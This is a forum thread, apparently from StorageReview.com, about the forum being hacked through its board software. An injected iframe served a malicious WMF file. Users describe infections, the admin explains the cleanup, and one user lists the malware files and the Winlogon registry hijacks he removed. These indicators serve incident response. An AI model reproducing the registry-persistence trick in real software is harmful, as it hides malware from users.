Sign in to follow this  
Christer

Java start and file download

Recommended Posts

I have never seen this before:

When the forum main page opened, Java was launched and a file download started. I didn't give myself time to take notes on from where before I clicked to interrupt.

What's up? Is this a new thing or related to the spam issue?

Christer

Share this post


Link to post
Share on other sites

After posting the above I went back to the start page of the forums and it took a long time to load. It said to be connecting to 81.95.153.241 (if I got it right).

Christer

Share this post


Link to post
Share on other sites
Guest Eugene

Christer,

THanks to you and others for pointing this out... unfortunately it seems something was inserted into the database that caused this to launch :(. We didn't start receiving reports about this until earlier today, however. We've given the database a good scrubbing and removed the offending references.

I'm so sorry about all the grief this is causing loyal readers. I'll continue to try and update folks if any new information arises.

Share this post


Link to post
Share on other sites

Hello all--

Looks like someone gained access to the Invision Power Board control panel, probably using an SQL injection exploit which IPB 2.1.6 (Thanks to Ben Nickell for finding a reference to this)

Security bugs in general are unfortunately still common in software today. The announcement that Microsoft will be patching a record 26 security holes is not particularly inspiring in this regard.

It looks like this is what happened:

A script kiddie/spammer used the control panel to send out a mass mail as discussed in this thread. Fortunately, StrorageReview.com users are far more savvy than the average internet user, so few likely installed the adware as suggested from the very obviously suspicious email.

"You[sic] in VIP club." Yeah. That's convincing.

Ad-aware and other free scanners will likely uninstall it for anyone affected.

Later, s/he ran the script again while we were still researching what happened and used the control panel to add an iframe to the forum skin. This made the forums request a download of a .WMF (Windows Metafile). I'm not sure why this was done since the WMF Windows flaw had been patched for ages. (see the Wikipedia article).

With or without virus scanning software, any system which has been on WindowsUpdate since January, as well as any Windows 98, Windows ME, Mac, or Linux system would be uneffected.

The forums technically could have been brought back up much sooner than they were, but we wanted to grep all database tables; scan the PHP, HTML, XML, JS, and perl files, beef up the firewall, scan the 200MB or so of logs, and generally have the time of our lives. We didn't even get the satisfaction of finding anything else, though I guess that's a good thing.

So, that was our week. How's yours been?

Share this post


Link to post
Share on other sites

You know all of us would like to choke the crap out of the person who screwed with the site,but you gotta admit the members who caught it and the admin folks who fixed it were on the ball.Stuff happens,always will. :)

Share this post


Link to post
Share on other sites

Like Eugene mentioned up above, I'm one of the savvy forum goers who knew better than to click that VIP staus toolbar link.

And then yesterday, while visiting here, Kaspersky 6.0 saved my PCs *ss and mine ;-) by catching the malicious trojan scripts installment.

Thank you Admins for taking care of this quickly and revising the security of this site!

Share this post


Link to post
Share on other sites
Sorry, has to be said...

I'm glad I'm using a Mac. :P

Yeah, and I'm sure our webmaster is glad he's using Linux, but that didn't keep him from getting hacked.

Just remember to stay up to date on your patches. Seriously. Not just for the OS but for any software you use on it. If you look at things like BugTraq you'll find that layered software exploits and cross-platform attacks are becoming much more frequent. As the OS' become more secure, hackers will find other ways in, and the bad news is that those other ways often turn out to be cross-platform vulnerabilities.

Share this post


Link to post
Share on other sites
Hello all--

Looks like someone gained access to the Invision Power Board control panel, probably using an SQL injection exploit which IPB 2.1.6 (Thanks to Ben Nickell for finding a reference to this)

Security bugs in general are unfortunately still common in software today. The announcement that Microsoft will be patching a record 26 security holes is not particularly inspiring in this regard.

It looks like this is what happened:

A script kiddie/spammer used the control panel to send out a mass mail as discussed in this thread. Fortunately, StrorageReview.com users are far more savvy than the average internet user, so few likely installed the adware as suggested from the very obviously suspicious email.

"You[sic] in VIP club." Yeah. That's convincing.

Ad-aware and other free scanners will likely uninstall it for anyone affected.

Later, s/he ran the script again while we were still researching what happened and used the control panel to add an iframe to the forum skin. This made the forums request a download of a .WMF (Windows Metafile). I'm not sure why this was done since the WMF Windows flaw had been patched for ages. (see the Wikipedia article).

With or without virus scanning software, any system which has been on WindowsUpdate since January, as well as any Windows 98, Windows ME, Mac, or Linux system would be uneffected.

The forums technically could have been brought back up much sooner than they were, but we wanted to grep all database tables; scan the PHP, HTML, XML, JS, and perl files, beef up the firewall, scan the 200MB or so of logs, and generally have the time of our lives. We didn't even get the satisfaction of finding anything else, though I guess that's a good thing.

So, that was our week. How's yours been?

This post is not particularly clear. What SR running 2.1.6 when this exploit was used, and now you have updated to 2.1.7? Or is their a flaw in 2.1.7 also??? Disappointing in lack of links to discussion of these problems, known already? But typical of SR's 'you don't need to know the details, if and when we get around to it' philosophy...why would we be more interested in Wiki WMF description of an old problem, where's the link to the detailed explaination of problem that was caused HERE?

I also wonder about "user group" in sivar's link to the other SRBG thread, other than mods/Admin, are not the majority of SR members of "group" "member", in which case the hijack of Admin level access means they would not need to 'manually' harvest e-mails, they could have gotten the lions share of the DB of group "member"...again, not very clear posting by sivar.

While were at it, I though I read some time just after the DB crash(accidental erasure) of 2002? That SR was co-located. If so, why can't you guys just put up a redirect to a simple page (instead of announcement) explaining reason for SR being down, while maintenance is being done...instead of the boring Apache Redhat page we always get, which only indicates that SR is offline....Do'h.

Sorry, has to be said...

I'm glad I'm using a Mac. :P

Yeah, but you also have a PC, don't you :).

Mac browsers are not immune to malicious javascripting (unless you turn that off in preferences, in which case many parts of sites will not work correctly/well), just Windows viruses. Javascripts can be used to harvest various kinds of information, more serious than just e-mail addy's.

Share this post


Link to post
Share on other sites
Looks like someone gained access to the Invision Power Board control panel, probably using an SQL injection exploit which IPB 2.1.6 (Thanks to Ben Nickell for finding a reference to this)

[...]

I was one of the unlucky ones who tried to access the forums yesterday around 1115am EDT and found that the hard way that one of my office PCs wasn't up to date on patches, and that Symantec Antivirus 9 (the office standard, thanks) is only borderline useful. While the office's firewall and proxy servers limited data risk, it still took me some time to eradicate the resulting infection and stabilize the system.

If anyone else was similarly unfortunate, you'll find that in order to find and get rid of some of these files you will have to boot from a CD or other NTFS -capable boot media/device. The following was what I found, most of the files bearing a current time stamp but exceptions noted...

Removed from C:\WINDOWS\System32:

MZU_DRV.SYS

_mzu_stonedrv2.exe

~.EXE

NTOS.EXE (cleverly dated 8/4/04, haha)

Removed from C:\Program Files\Common Files\Microsoft Shared\Web Folders:

ibm00005.exe

ibm00004.dll

ibm00005.dll

ibm00006.dll

Removed from C:\WINDOWS\Prefetch:

IBM00001.EXE

_IBM00003.EXE

~.EXE

Removed C:\WINDOWS\System32\wsnpoem folder and:

audio.dll

video.dll

I believe there were a few things in %TEMP% too but I recall them being redundant to what's above.

Fixed the following registry keys:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogo\Shell = "explorer.exe"

WAS "explorer.exe [many spaces...] C:\Program Files\Common Files\Microsoft Shared\Web Folders\ibm00005.exe"

(so that in REGEDIT it /looks like/ explorer.exe!!!)

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\WINDOWS\system32\userinit.exe,"

WAS "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,"

Finally, interestingly, a follow-up full system scan with SAV after all else was done, found some things in Windows' system restore folder that it chose to quarantine just now:

A0024392.exe

A0025313.sys

A0027385.exe

I'm poking around the system with a few more fun tools before I call this a closed matter but thought it would be nice to share the information ASAP in case anyone else is suffering the same problems.

Share this post


Link to post
Share on other sites
With or without virus scanning software, any system which has been on WindowsUpdate since January, as well as any Windows 98, Windows ME, Mac, or Linux system would be uneffected.

In theory... Both my XP boxes (main PC and a laptop) with all patches except the ones pushed out on Tuesday blue screened. My main box didn't have any AV software (for performance reasons), and the .wmf file opened in Irfanview. I was able to save an exact copy of the file with Irfanview's Copy feature, and scanned it over the network from my XP laptop, which has Trend Micro PC-Cillian, which reported it being infected. Feeling safe on the laptop, I tried opening the storage review forums on the laptop. PC-Cillian reported a virus and said it quarantined it. Key word "said"... apparently it did execute in some way, not via Irfanview, but somehow, because within a few seconds the laptop bluescreened and would not get past the login without bluescreening. This laptop has a fresh install, less than a week old with all patches except for Tuesday's, and an updated PC-Cillian antivirus scanner, yet the virus executed and killed it. Fortunately I had a ghost backup and was able to get it going again quickly.

Meanwhile my main PC bluescreened while I was working on the laptop. I was able to log in and apply the MS patches and intalled PC-Cillian. I went to SR's forums again and got the warning with PC-Cillian, but the machine stayed stable. I tried the site again on the laptop (after installing the latest patches), warning again and the laptop stayed stable.

So... it seems PC-Cillian did NOT protect me from the virus. It seems the MS patches before this Tuesday did not protect me. And finally it seems the issue was only corrected by the latest MS patches pushed out this week! Argh...

Share this post


Link to post
Share on other sites

Wow, I was here then and saw nothing unusual. But I run Firefox with no Java, no Flash,etc as my main browser, leaving stuff like that installed for Internet Explorer only.

Share this post


Link to post
Share on other sites

One of the viruses detected was EXPL_SSLICE.GEN, which is unknown to symantec, trendmicro, and google (only one hit, a listing of recent virus activity), is apparently near zero day and would explain what I experienced. The other ones detected are the well known TROJ_NASCENE.D and EXPL_WMF.GEN (detected on subsequent refreshes of SR's forums).

Edited by sixthofmay

Share this post


Link to post
Share on other sites
Yeah, but you also have a PC, don't you :).

Mac browsers are not immune to malicious javascripting (unless you turn that off in preferences, in which case many parts of sites will not work correctly/well), just Windows viruses. Javascripts can be used to harvest various kinds of information, more serious than just e-mail addy's.

Yeah, not that I use my PC often. And most javascript exploits target Internet Explorer (even though by their nature, they COULD be cross-platform,) making even FireFox users more safe.

This one is one that I was 'safe' from because Safari won't try to open a WMF all on its own the way IE will.

I do keep my computers (Mac, PC, and various shades of Unix,) all patched up, because I know the OS isn't the only vulnerable point. (As was in this case. The forum software was hijacked, but I'm sure the underlying server was still 'secure'.)

Share this post


Link to post
Share on other sites
And finally it seems the issue was only corrected by the latest MS patches pushed out this week!

I had just installed the latest batch of updates to WinXP but it didn't prevent the infection. Neither did Norton AntiVirus 2005 (also updated) prevent it but catched whatever was downloaded or executed and thus limited the damage. I never had a BSOD.

I have a single user account on my computer and all web applications are running under DropMyRights which limits the privileges for an administrator account. I have to use a different link to be able to use Windows Update which require administrator privileges. I believed that DMR would prevent this kind of installation but obviously not.

It seems like I was one of the first members to get hit and with the Image Viewer opening with each click for a new page and NAV trailing with a popup message, I kind of went into "Panic Lite". I had just installed the updates to WinXP and had created a new Ghost image. My backup HDD was running in the mobile rack and I was not sure that it was safe.

Christer

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this